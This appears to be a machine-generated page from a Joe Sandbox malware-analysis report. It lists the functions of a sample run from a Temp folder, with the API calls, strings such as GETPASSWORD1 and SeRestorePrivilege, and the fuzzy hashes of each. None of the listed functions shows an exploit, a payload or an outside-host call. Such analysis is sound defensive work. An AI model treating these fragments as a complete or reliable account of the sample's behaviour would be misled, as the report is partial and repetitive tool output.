Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bc9335ea65a5bd02cfbc64b0614dd28500ab9fccc793db824fe54762f8e54279
Instruction ID: e01ff69d988f32f405cdc6a8a87b7a0864f5d6ca1fb849660390a54816a129ab
Opcode Fuzzy Hash: bc9335ea65a5bd02cfbc64b0614dd28500ab9fccc793db824fe54762f8e54279
Instruction Fuzzy Hash: 8A41D232A00308DFCB28DF78C885A6EB7A5FF89714F1545A9E615EB351DB35AD01CB80

Function 007FB610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 007FB619
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007FB63C

Part of subcall function 007F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007FC13D,00000000,?,007F67E2,?,00000008,?,007F89AD,?,?,?), ref: 007F854A

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 007FB662
_free.LIBCMT ref: 007FB675
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007FB684

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 03ab359a858400c7933f50d21b689032be576be92ac4a5a1fa6d216244c88bec
Instruction ID: 73f38be647fb539191b585f9fbda30b7ffe27485fbe8038583327cf556212a54
Opcode Fuzzy Hash: 03ab359a858400c7933f50d21b689032be576be92ac4a5a1fa6d216244c88bec
Instruction Fuzzy Hash: 4101A772611619BF63611A76AC8CC7F7A6DEEC7BA13250229FE04D7310DF68CD0191B0

Function 007F9029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,007F895F,007F85FB,?,007F8FD3,00000001,00000364,?,007F3713,00000050,?,00810EE8,00000200), ref: 007F902E
_free.LIBCMT ref: 007F9063
_free.LIBCMT ref: 007F908A
SetLastError.KERNEL32(00000000,?,00810EE8,00000200), ref: 007F9097
SetLastError.KERNEL32(00000000,?,00810EE8,00000200), ref: 007F90A0

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 477b04f646072e427ef754c95c0a5b77f8646cc48748f454798e9240826f5bea
Instruction ID: 46c65a08872e2b9f45eaba2fbff35b6108297eba7cb67edd9d874518b3b00cc0
Opcode Fuzzy Hash: 477b04f646072e427ef754c95c0a5b77f8646cc48748f454798e9240826f5bea
Instruction Fuzzy Hash: 3501F472605A0AABD37267356C89B3B261DBBD07717240024F719D2352EF6C8C014161

Function 007E075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 007E0A41: ResetEvent.KERNEL32(?), ref: 007E0A53
Part of subcall function 007E0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 007E0A67

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 007E078F
CloseHandle.KERNEL32(?,?), ref: 007E07A9
DeleteCriticalSection.KERNEL32(?), ref: 007E07C2
CloseHandle.KERNEL32(?), ref: 007E07CE
CloseHandle.KERNEL32(?), ref: 007E07DA

Part of subcall function 007E084E: WaitForSingleObject.KERNEL32(?,000000FF,007E0A78,?), ref: 007E0854
Part of subcall function 007E084E: GetLastError.KERNEL32(?), ref: 007E0860

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: d58bc2b223e3bcc63af0d454195868dbecd8cc9f3ef2b5675d6f392aa44b42a1
Instruction ID: d37bee8c2e939174ddb96fe05599e91ed9dc3e90f01a8842183e1380a66ba874
Opcode Fuzzy Hash: d58bc2b223e3bcc63af0d454195868dbecd8cc9f3ef2b5675d6f392aa44b42a1
Instruction Fuzzy Hash: 7001B571441B44EFCB229B65DC88FC6BBEDFB49710F004529F15A82160CBB56A44CB90

Function 007FBF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 007FBF28

Part of subcall function 007F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?), ref: 007F84F4
Part of subcall function 007F84DE: GetLastError.KERNEL32(?,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?,?), ref: 007F8506

_free.LIBCMT ref: 007FBF3A
_free.LIBCMT ref: 007FBF4C
_free.LIBCMT ref: 007FBF5E
_free.LIBCMT ref: 007FBF70

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 534cf692aa93dd10a5c6357b5432697d800278d00ab1b23f0a37a2a935d91a24
Instruction ID: 26e9412d417fdab8e26a671c34cc08375a5c5dde34b872e9a39614bd62517141
Opcode Fuzzy Hash: 534cf692aa93dd10a5c6357b5432697d800278d00ab1b23f0a37a2a935d91a24
Instruction Fuzzy Hash: 53F0FF3350924DE7C6A0EF68EE8AD3773D9FA047107644C09F609D7A10CB28FC808A55

Function 007F8060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 007F807E

Part of subcall function 007F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?), ref: 007F84F4
Part of subcall function 007F84DE: GetLastError.KERNEL32(?,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?,?), ref: 007F8506

_free.LIBCMT ref: 007F8090
_free.LIBCMT ref: 007F80A3
_free.LIBCMT ref: 007F80B4
_free.LIBCMT ref: 007F80C5

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 306ba693f2efc52f3a023301a4cccba2a25c7bb4ccf1093f8394f17e74459972
Instruction ID: 29924cdddef888e72cdd0f44a06713f42578cab5b804fb6f7e64ae0008533d71
Opcode Fuzzy Hash: 306ba693f2efc52f3a023301a4cccba2a25c7bb4ccf1093f8394f17e74459972
Instruction Fuzzy Hash: 58F03AB6805169CBCBD1AF59FC0A4273B65F764B203084E0AFA0097B70DF3908519FC2

Function 007F76BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe,00000104), ref: 007F76FD
_free.LIBCMT ref: 007F77C8
_free.LIBCMT ref: 007F77D2

Strings

C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe, xrefs: 007F76F4, 007F76FB, 007F772A, 007F7762

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe
API String ID: 2506810119-2759322758
Opcode ID: 956537905a7560f7b06df491ff674c273a35f891d905785af3d318bfd6b37047
Instruction ID: 575bae82f0fdd5ce8240301b7cb180ac6b6a5b456a2a68b3b95a2f7199189721
Opcode Fuzzy Hash: 956537905a7560f7b06df491ff674c273a35f891d905785af3d318bfd6b37047
Instruction Fuzzy Hash: 78319171A1820CEFDB25EF99DC899BEBBECEB94710B144066E60497311D6B44E40CBA1

Function 007D7574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007D7579

Part of subcall function 007D3B3D: __EH_prolog.LIBCMT ref: 007D3B42

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 007D7640

Part of subcall function 007D7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 007D7C04
Part of subcall function 007D7BF5: GetLastError.KERNEL32 ref: 007D7C4A
Part of subcall function 007D7BF5: CloseHandle.KERNEL32(?), ref: 007D7C59

Strings

SeRestorePrivilege, xrefs: 007D75D3
SeSecurityPrivilege, xrefs: 007D75BE

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 8db7f4274e854334db7d3f829a387124e05b46665d47227123c06c5b9baacd6e
Instruction ID: ab98934e0be7aef48fdd48c54c30ea1d9ab0a2cf6192a910db743e13e2284ad7
Opcode Fuzzy Hash: 8db7f4274e854334db7d3f829a387124e05b46665d47227123c06c5b9baacd6e
Instruction Fuzzy Hash: 5F31C471908248EEDF14EBA4DC49BEE7B7CBF54314F004056F445E7292EBB88A44CB61

Function 007EA430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365

EndDialog.USER32(?,00000001), ref: 007EA4B8
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 007EA4CD
SetDlgItemTextW.USER32(?,00000066,?), ref: 007EA4E2

Strings

ASKNEXTVOL, xrefs: 007EA448

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 23330e93086a6d5daf68723c631df90328e5e7c2ee9c0b1edc54adad5696d0c2
Instruction ID: e7d90078dd7ff607d46f4d04b9fcfd22c29ad9367f2418d93f7b494663515d81
Opcode Fuzzy Hash: 23330e93086a6d5daf68723c631df90328e5e7c2ee9c0b1edc54adad5696d0c2
Instruction Fuzzy Hash: 7F1181322462C0BFD6219FAD9D4DF6637A9FB8F700F144405F241DA1E0C7A9A906DB22

Function 007DD1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 007DD22E
_strncpy.LIBCMT ref: 007DD278

Strings

@%s, xrefs: 007DD218
$%s, xrefs: 007DD223

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: 317c00e86b1c25119066f6b867246c4c062bd2f2bcea88454c091a5aa817f7eb
Instruction ID: f7824fa6635cf0f7c2e879f0d1539af84b1f6f036b34c245599d9223bf7d553c
Opcode Fuzzy Hash: 317c00e86b1c25119066f6b867246c4c062bd2f2bcea88454c091a5aa817f7eb
Instruction Fuzzy Hash: 8B213B7254024CAADB319EA4CC4AFEA7BB8FB05300F040513FA15962A1E379EA559B61

Function 007EA990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365

EndDialog.USER32(?,00000001), ref: 007EA9DE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 007EA9F6
SetDlgItemTextW.USER32(?,00000067,?), ref: 007EAA24

Strings

GETPASSWORD1, xrefs: 007EA9A9

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: e874e7e78d15ef61f40dd56df7e7317ffd993b56e95b0973648977bed5d3732f
Instruction ID: 6e00c1ec4d0bfe264d6d9fe235a9fb92a686195f5e5218a090f36cffbb4cbfd5
Opcode Fuzzy Hash: e874e7e78d15ef61f40dd56df7e7317ffd993b56e95b0973648977bed5d3732f
Instruction Fuzzy Hash: F5114832941218BADB21AE659E09FFA377CFB4D300F004421FA45F2191C268B954D672

Function 007DB4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 007DB51E

Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D

_wcschr.LIBVCRUNTIME ref: 007DB53C
_wcschr.LIBVCRUNTIME ref: 007DB54C

Strings

%c:\, xrefs: 007DB514

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 3f1d3a45c298c6370f6d679cf4928a49add426a04aff017156981f6bdb3dd1c0
Instruction ID: 574dbc86179958082eaa9fea04252799d57c0d0da80b62082d290f331b487a41
Opcode Fuzzy Hash: 3f1d3a45c298c6370f6d679cf4928a49add426a04aff017156981f6bdb3dd1c0
Instruction Fuzzy Hash: F301F953904311FAD720AB75AC8AC7BB7BCDE953A0B914417F986D7281FB38D970C2A1

Function 007E06BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,007DABC5,00000008,?,00000000,?,007DCB88,?,00000000), ref: 007E06F3
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,007DABC5,00000008,?,00000000,?,007DCB88,?,00000000), ref: 007E06FD
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,007DABC5,00000008,?,00000000,?,007DCB88,?,00000000), ref: 007E070D

Strings

Thread pool initialization failed., xrefs: 007E0725

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: becc8b2b7d996c6fe8a22085f62cbbc0c5956495ddae82f666f126c6bd6cf1f8
Instruction ID: 71b2d500e79fa9d1f9820aa79c337aacf0b14b7ee424c549aa990a1282c85466
Opcode Fuzzy Hash: becc8b2b7d996c6fe8a22085f62cbbc0c5956495ddae82f666f126c6bd6cf1f8
Instruction Fuzzy Hash: 361170B1601709AFD3215F66DC88AA7FBECFB99754F10482EF1DAC2200D6B56981CB90

Function 007ED38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 007ED3DE
REPLACEFILEDLG, xrefs: 007ED3C9, 007ED3FD

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 4e5b3b9b18b8169b972dfdf522c2839df80b4ee916e570725231adc8efec0ff5
Instruction ID: 8b2340c5c95419739638204cde179d801592cf2d1378ac32ce94224d5ee5ce0a
Opcode Fuzzy Hash: 4e5b3b9b18b8169b972dfdf522c2839df80b4ee916e570725231adc8efec0ff5
Instruction Fuzzy Hash: 6E01F17160228AEFCB219F1AED01A963FADFB1C380B108421F901C2270CA789C50EBA0

Function 007F91DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 007F9269
__alldvrm.LIBCMT ref: 007F946A
__alldvrm.LIBCMT ref: 007F948C

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
Instruction ID: 6cdec5e5323eff8a73ca0ac2e6ebad2d8339aef0d1c5da9077d3c0fbdacbe52f
Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
Instruction Fuzzy Hash: 47A14572A0438A9FDB25CF68C8917BEBBE5FF65310F144169E7859B381C23C9942C751

Function 007DA2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,007D80B7,?,?,?), ref: 007DA351
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,007D80B7,?,?), ref: 007DA395
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,007D80B7,?,?,?,?,?,?,?,?), ref: 007DA416
CloseHandle.KERNEL32(?,?,00000000,?,007D80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 007DA41D

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 83772c18b38c39f7ca81673fb872b9a02fc98beda036c6dcf992160b20cd3ef7
Instruction ID: ccbf8bc03a3a98ac0ccb880d929cb9fc10c7e78ad4e3f6f64ec4b1ee1077510c
Opcode Fuzzy Hash: 83772c18b38c39f7ca81673fb872b9a02fc98beda036c6dcf992160b20cd3ef7
